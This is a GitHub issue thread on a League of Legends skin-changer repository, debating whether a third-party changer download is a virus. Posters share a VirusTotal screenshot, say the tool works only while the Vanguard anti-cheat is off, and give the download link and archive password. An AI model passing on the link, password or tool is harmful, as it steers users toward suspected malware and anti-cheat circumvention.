### ISSUE TITLE
new skin changer virus or not?

### ISSUE THREAD

**Issue by illitiratehobo** [R3nzTheCodeGOD/R3nzSkin#1142]
https://www.perfectmod.fun/lol-changer

**Comment by dedddok** [comment]
ofc it is

**Comment by dasgorila** [comment]
This is what happens when I run the exe file in Virus Total xd
![Screenshot_468](https://github.com/R3nzTheCodeGOD/R3nzSkin/assets/107007619/4e54e544-2605-4c44-9678-1ec3676ba457)

**Comment by Pierreluc23** [comment]
It working but only when Vanguard is not running it work only for few minutes 
![Not working with Vanguard running ](https://github.com/R3nzTheCodeGOD/R3nzSkin/assets/168309875/b8937867-85ce-40a3-aa7c-204fd9c7cc61)

**Comment by Vanuty** [comment]
> https://www.perfectmod.fun/lol-changer
What's the unzip code?

**Comment by lwlxsgnet** [comment]
> It working but only when Vanguard is not running it work only for few minutes ![Not working with Vanguard running](https://private-user-images.githubusercontent.com/168309875/333821495-7e7b276a-7c18-4589-a667-0448504a812a.PNG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTY3ODE2NjQsIm5iZiI6MTcxNjc4MTM2NCwicGF0aCI6Ii8xNjgzMDk4NzUvMzMzODIxNDk1LTdlN2IyNzZhLTdjMTgtNDU4OS1hNjY3LTA0NDg1MDRhODEyYS5QTkc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUyN1QwMzQyNDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMWY0NTkxYzk0MjYyOTg5NjcyMzcwNWI5OTJiZjRjMDljNjI3YzAxYTc2MDk3NDY5MDY0N2I2MGFmZGNlY2FjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.dxu4NVwNlEZh15R7aaGgmngq_mqtxRLNnHQcA_Z1u6s)
> 
> This is what happens when you try to inject it with Vanguard running ![It not inject with Vanguard running](https://private-user-images.githubusercontent.com/168309875/333821218-ca2240e3-6a0d-48e4-9792-12764c338490.PNG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTY3ODE2NjQsIm5iZiI6MTcxNjc4MTM2NCwicGF0aCI6Ii8xNjgzMDk4NzUvMzMzODIxMjE4LWNhMjI0MGUzLTZhMGQtNDhlNC05NzkyLTEyNzY0YzMzODQ5MC5QTkc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUyN1QwMzQyNDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hODZjNmY4ZjcxMzIzMmVmODU2ZDNiOTIyMTg1YTM5MWRjMWQ2OGY1YzY5NDNiOWZjNDY5ZGZiZGJlZDJmZmQ4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.bWF1mVppxPbGy4L8do4fjna0ZFr-OOHt4Y1L9ycgmpU)

which server？

**Comment by Pierreluc23** [comment]
> > It working but only when Vanguard is not running it work only for few minutes ![Not working with Vanguard running](https://private-user-images.githubusercontent.com/168309875/333821495-7e7b276a-7c18-4589-a667-0448504a812a.PNG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTY3ODE2NjQsIm5iZiI6MTcxNjc4MTM2NCwicGF0aCI6Ii8xNjgzMDk4NzUvMzMzODIxNDk1LTdlN2IyNzZhLTdjMTgtNDU4OS1hNjY3LTA0NDg1MDRhODEyYS5QTkc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUyN1QwMzQyNDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMWY0NTkxYzk0MjYyOTg5NjcyMzcwNWI5OTJiZjRjMDljNjI3YzAxYTc2MDk3NDY5MDY0N2I2MGFmZGNlY2FjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.dxu4NVwNlEZh15R7aaGgmngq_mqtxRLNnHQcA_Z1u6s)
> > This is what happens when you try to inject it with Vanguard running ![It not inject with Vanguard running](https://private-user-images.githubusercontent.com/168309875/333821218-ca2240e3-6a0d-48e4-9792-12764c338490.PNG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTY3ODE2NjQsIm5iZiI6MTcxNjc4MTM2NCwicGF0aCI6Ii8xNjgzMDk4NzUvMzMzODIxMjE4LWNhMjI0MGUzLTZhMGQtNDhlNC05NzkyLTEyNzY0YzMzODQ5MC5QTkc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUyN1QwMzQyNDRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hODZjNmY4ZjcxMzIzMmVmODU2ZDNiOTIyMTg1YTM5MWRjMWQ2OGY1YzY5NDNiOWZjNDY5ZGZiZGJlZDJmZmQ4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.bWF1mVppxPbGy4L8do4fjna0ZFr-OOHt4Y1L9ycgmpU)
> 
> which server？

NA

**Comment by Pierreluc23** [comment]
> > https://www.perfectmod.fun/lol-changer
> > What's the unzip code?

The password is changer.

**Comment by Vanuty** [comment]
能告诉我这个软件后续更新地址吗？
